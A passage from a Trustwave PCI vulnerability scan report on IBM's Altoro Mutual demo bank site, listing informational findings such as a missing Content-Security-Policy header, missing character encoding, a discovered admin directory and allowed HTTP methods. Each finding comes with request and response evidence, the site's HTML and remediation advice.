which type of resources are allowed to be loaded. This header can be
useful to prevent Cross-Site Scripting issues present on the site, if used
correctly.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET https://demo.testfire.net:8443/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Response: HTTP/1.1 200 OK


Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B;
Path=/; Secure; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:36:24 GMT
Content-Length: 9369

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 639 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 640 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 641 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 642 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 643 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

<!-- Keywords:Altoro Mutual, online banking,


banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />
<br />
<center><img src="images/home1.jpg" width="170" height="
114" /></center>
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170" height="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 644 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />

<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

<center><img src="images/home3.jpg" width="170"


height="113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 645 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.
<br /><br />
</td>
</tr>
</table>

</td>

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 646 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
Consider utilizing strict Content-Security-Policy header option to

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 647 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
prevent Cross-Site Scripting issues.

304 HTTP Responses Missing 0.0 Info Pass URL: https://demo.testfire.net:8443/retirement.htm


Character Encoding Port: tcp/8443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 648 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
URL: https://demo.testfire.net:8443/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

305 Discovered Web Directories 0.0 Info Pass URL: https://65.61.137.117:443/admin/


Port: tcp/443

It was possible to guess one or more directories contained in the


publicly accessible path of this web server.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: https
Application: apache:tomcat

Evidence:
HTTP Response Code: 302
URL: https://65.61.137.117:443/admin/

Remediation:
Review these directories and verify that there is no unintentional
content made available to remote users.

306 Website Detected 0.0 Info Pass URL: http://65.61.137.117/


Port: tcp/80

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 649 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
This website was detected.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:
application_name: apache:tomcat
path: /
potential_custom_web_app: true

307 HTTP Responses Missing 0.0 Info Pass URL: https://65.61.137.117/retirement.htm


Character Encoding Port: tcp/443

During the crawl of the HTTP service, we detected HTML and/or XML
documents that were missing any indication of their character set
encoding. The server and the pages it serves are responsible for
indicating the character set used to encode the documents. Typically,
these are indicated within the "Content-type" HTTP header, a 'meta'
HTTP-equiv HTML tag, or an XML document encoding header. Without
these, some web browsers may attempt to guess the character set
encoding of the document by making a guess based on whats
available. The danger in this is when browsers guess the incorrect
encoding, resulting in a misinterpretation of the document. In cases
where a webpage will reflect user-supplied information, an attacker
could provide a specially-crafted string that could trick a web browser
into decoding the document as a specific character set. If this specially-
crafted string were HTML code encoded in the character set, the
attacker could perform a cross-site scripting attack.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 650 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Service: https
Application: apache:tomcat

Reference:
http://code.google.com/p/browsersec/wiki/Part2#Character_set_handlin
g_and_detection
http://wiki.whatwg.org/wiki/Web_Encodings

Evidence:
URL: https://65.61.137.117/retirement.htm

Remediation:
It's important that all documents served by the HTTP server provide the
correct character set for their encoding. The provided links will provide
information on the proper ways for indicating the character set
encoding.

308 Discovered HTTP Methods 0.0 Info Pass URL: http://65.61.137.117:8080/swagger/


Port: tcp/8080

Requesting the allowed HTTP OPTIONS from this host shows which
HTTP protocol methods are supported by its web server. Note that, in
some cases, this information is not reported by the web server
accurately.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http
Application: apache:tomcat

Evidence:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 651 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
URL: http://65.61.137.117:8080/swagger/

Remediation:
Review your web server configuration and ensure that only those HTTP
methods required for your business operations are enabled.

309 Insecure or no Content- 0.0 Info Pass URL: http://65.61.137.117/


Security-Policy header Port: tcp/80

Content-Security-Policy (CSP) is a W3C specification offering the


possibility to instruct the client browser from which location and/or
which type of resources are allowed to be loaded. This header can be
useful to prevent Cross-Site Scripting issues present on the site, if used
correctly.

CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Service: http

Reference:
https://www.owasp.org/index.php/Content_Security_Policy

Evidence:
DetectionDetails: No Content-Security-Policy present for entire
application
Request: GET http://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 652 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7DEA7694E36255C4C48824F9A0DE4E13;
Path=/; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:27:23 GMT
Content-Length: 9369

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 653 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/login.jsp"><font
style="font-weight: bold; color: red;">Sign In</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 654 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/login.jsp" class="focus" >ONLINE BANKING
LOGIN</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 655 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink3"
href="index.jsp?content=personal_loans.htm">Loan
Products</a></li>
<li><a id="MenuHyperLink4"
href="index.jsp?content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5"
href="index.jsp?content=personal_investments.htm">Investments
&amp; Insurance</a></li>
<li><a id="MenuHyperLink6"
href="index.jsp?content=personal_other.htm">Other
Services</a></li>
</ul>

<a id="CatLink2" class="subheader"


href="index.jsp?content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7"
href="index.jsp?content=business_deposit.htm">Deposit
Products</a></li>
<li><a id="MenuHyperLink8"
href="index.jsp?content=business_lending.htm">Lending
Services</a></li>
<li><a id="MenuHyperLink9"
href="index.jsp?content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10"
href="index.jsp?content=business_insurance.htm">Insurance</a></li
>
<li><a id="MenuHyperLink11"
href="index.jsp?content=business_retirement.htm">Retirement</a><
/li>
<li><a id="MenuHyperLink12"
href="index.jsp?content=business_other.htm">Other
Services</a></li>
</ul>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 656 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

<!-- Keywords:Altoro Mutual, online banking,


banking, checking, savings, accounts -->
<br />
<table border=0 cellspacing=0 width="100%">
<tr>
<td width="33%" valign="top">
<b><a href="index.jsp?content=personal_savings.htm">Online
Banking with FREE Online Bill Pay </a></b><br />
No stamps, envelopes, or checks to write give you more time to
spend on the things you enjoy. <br />
<br />
<center><img src="images/home1.jpg" width="170" height="
114" /></center>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 657 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<br />

<b><a href="index.jsp?content=personal_loans.htm">Real
Estate Financing</a></b><br />
Fast. Simple. Professional. Whether you are preparing to buy,
build, purchase land, or construct new space, let Altoro Mutual's
premier real estate lenders help with financing. As a regional leader,
we know the market, we understand the business, and we have the
track record to prove it
</td>
<td width="33%" valign="top">
<center><img src="images/home2.jpg" width="170"
height="128" /></center>
<br /><br/>
<b><a href="index.jsp?content=business_cards.htm">Business
Credit Cards</a></b><br />
You're always looking for ways to improve your company's bottom
line. You want to be informed, improve efficiency and control expenses.
Now, you can do it all - with a business credit card account from Altoro
Mutual.
<br />

<br />
<b><a
href="index.jsp?content=business_retirement.htm">Retirement
Solutions</a></b><br />
Retaining good employees is a tough task. See how Altoro Mutual
can assist you in accomplishing this feat through effective Retirement
Solutions.
</td>
<td width="33%" valign="top">
<b>Privacy and Security </b><br />
The 2000 employees of Altoro Mutual are dedicated to protecting
your <a href="index.jsp?content=privacy.htm">privacy</a> and <a

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 658 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
href="default.jsp?content=security.htm">security</a>. We pledge to
provide you with the information and resources that you need to help
secure your information and keep it confidential. This is our promise.
<br /><br />

<center><img src="images/home3.jpg" width="170" height="


113" /></center><br /><br />

<b><a href="survey_questions.jsp">Win a Samsung Galaxy S10


smartphone</a></b>
<br />
Completing this short survey will enter you in a draw for 1 of 5
Samsung Galaxy S10 smartphones! We look forward to hearing your
important feedback.
<br /><br />
</td>
</tr>
</table>

</td>

</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 659 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 660 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

